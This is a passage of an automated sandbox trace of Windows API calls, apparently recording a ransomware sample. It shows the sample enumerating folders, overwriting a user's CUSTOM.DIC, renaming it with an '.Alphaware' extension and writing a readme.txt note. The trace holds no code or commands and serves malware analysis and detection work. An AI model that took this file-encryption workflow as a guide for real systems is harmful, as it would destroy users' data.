lpFindFileData=0x23e8d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0093.872] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7f8) returned 1 [0093.872] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23ea18) returned 1 [0093.873] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea58) returned 1 [0093.874] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795b3cd0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795d9e30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.874] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795d9e30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795d9e30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Certificates", cAlternateFileName="CERTIF~1")) returned 1 [0093.874] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795b3cd0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795b3cd0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CRLs", cAlternateFileName="")) returned 1 [0093.874] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795b3cd0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795b3cd0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CTLs", cAlternateFileName="")) returned 1 [0093.874] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795b3cd0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795b3cd0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CTLs", cAlternateFileName="")) returned 0 [0093.877] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e758) returned 1 [0093.878] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e978) returned 1 [0093.878] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea58) returned 1 [0093.878] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795b3cd0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795d9e30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.878] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795d9e30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795d9e30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Certificates", cAlternateFileName="CERTIF~1")) returned 1 [0093.878] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795b3cd0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795b3cd0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CRLs", cAlternateFileName="")) returned 1 [0093.878] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795b3cd0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795b3cd0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CTLs", cAlternateFileName="")) returned 1 [0093.878] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0093.878] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e758) returned 1 [0093.878] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e978) returned 1 [0093.878] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0093.878] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795d9e30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795d9e30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.879] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795d9e30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795d9e30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0093.879] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6b8) returned 1 [0093.879] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0093.879] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0093.879] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795d9e30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795d9e30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.879] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795d9e30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795d9e30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0093.879] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6b8) returned 1 [0093.879] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0093.879] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0093.879] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795b3cd0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795b3cd0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.879] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795b3cd0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795b3cd0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0093.879] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6b8) returned 1 [0093.879] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0093.880] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0093.880] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795b3cd0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795b3cd0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.880] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795b3cd0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795b3cd0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0093.880] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6b8) returned 1 [0093.880] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0093.880] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0093.880] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795b3cd0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795b3cd0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.880] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795b3cd0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795b3cd0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0093.880] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6b8) returned 1 [0093.880] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0093.880] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0093.880] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795b3cd0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795b3cd0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.881] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795b3cd0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795b3cd0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0093.881] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6b8) returned 1 [0093.881] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0093.883] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eaf8) returned 1 [0093.883] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x21509730, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x3e1d8b20, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x3e1d8b20, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.883] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2b354e30, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2b354e30, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2b4aba90, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x4615, dwReserved0=0x0, dwReserved1=0x0, cFileName="Normal.dotm", cAlternateFileName="NORMAL~1.DOT")) returned 1 [0093.884] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0093.884] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7f8) returned 1 [0093.884] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23ea18) returned 1 [0093.884] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eaf8) returned 1 [0093.884] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x21509730, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x3e1d8b20, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x3e1d8b20, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.884] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2b354e30, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2b354e30, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2b4aba90, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x4615, dwReserved0=0x0, dwReserved1=0x0, cFileName="Normal.dotm", cAlternateFileName="NORMAL~1.DOT")) returned 1 [0093.884] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2b354e30, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2b354e30, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2b4aba90, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x4615, dwReserved0=0x0, dwReserved1=0x0, cFileName="Normal.dotm", cAlternateFileName="NORMAL~1.DOT")) returned 0 [0093.884] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7f8) returned 1 [0093.884] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23ea18) returned 1 [0093.884] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eaf8) returned 1 [0093.885] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x426ba7c0, ftCreationTime.dwHighDateTime=0x1d7b065, ftLastAccessTime.dwLowDateTime=0x426ba7c0, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x426ba7c0, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.885] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x426ba7c0, ftCreationTime.dwHighDateTime=0x1d7b065, ftLastAccessTime.dwLowDateTime=0x426ba7c0, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x426e0920, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x0, dwReserved1=0x0, cFileName="CUSTOM.DIC", cAlternateFileName="")) returned 1 [0093.885] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0093.885] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7f8) returned 1 [0093.885] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23ea18) returned 1 [0093.885] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC", dwFileAttributes=0x80) returned 1 [0093.886] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8b8) returned 1 [0093.886] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\uproof\\custom.dic"), fInfoLevelId=0x0, lpFileInformation=0x23cd660 | out: lpFileInformation=0x23cd660*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x426ba7c0, ftCreationTime.dwHighDateTime=0x1d7b065, ftLastAccessTime.dwLowDateTime=0x426ba7c0, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x426e0920, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x18)) returned 1 [0093.886] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e868) returned 1 [0093.886] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e948) returned 1 [0093.886] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\uproof\\custom.dic"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0093.886] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8b8) returned 1 [0093.886] ReadFile (in: hFile=0x250, lpBuffer=0x23cd908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23cd908*, lpNumberOfBytesRead=0x23e9f8*=0x18, lpOverlapped=0x0) returned 1 [0093.905] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e878) returned 1 [0093.905] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\uproof\\custom.dic"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0093.906] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7e8) returned 1 [0093.907] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7e8) returned 1 [0093.907] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\uproof\\custom.dic"), fInfoLevelId=0x0, lpFileInformation=0x23eb10 | out: lpFileInformation=0x23eb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x426ba7c0, ftCreationTime.dwHighDateTime=0x1d7b065, ftLastAccessTime.dwLowDateTime=0x426ba7c0, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x8a2bb560, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xf4)) returned 1 [0093.908] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e798) returned 1 [0093.908] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\uproof\\custom.dic"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\uproof\\custom.dic.alphaware")) returned 1 [0093.908] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e908) returned 1 [0093.908] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\UProof\\readme.txt" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\uproof\\readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0093.909] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e878) returned 1 [0093.910] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eaf8) returned 1 [0093.910] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x426ba7c0, ftCreationTime.dwHighDateTime=0x1d7b065, ftLastAccessTime.dwLowDateTime=0x8a2bb560, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x8a2bb560, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.910] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x426ba7c0, ftCreationTime.dwHighDateTime=0x1d7b065, ftLastAccessTime.dwLowDateTime=0x426ba7c0, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x8a2bb560, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xf4, dwReserved0=0x0, dwReserved1=0x0, cFileName="CUSTOM.DIC.Alphaware", cAlternateFileName="CUSTOM~1.ALP")) returned 1 [0093.910] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8a2bb560, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x8a2bb560, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x8a2bb560, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 1 [0093.910] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8a2bb560, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x8a2bb560, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x8a2bb560, ftLastWriteTime.dwHighDateTime=0x1d9897a, 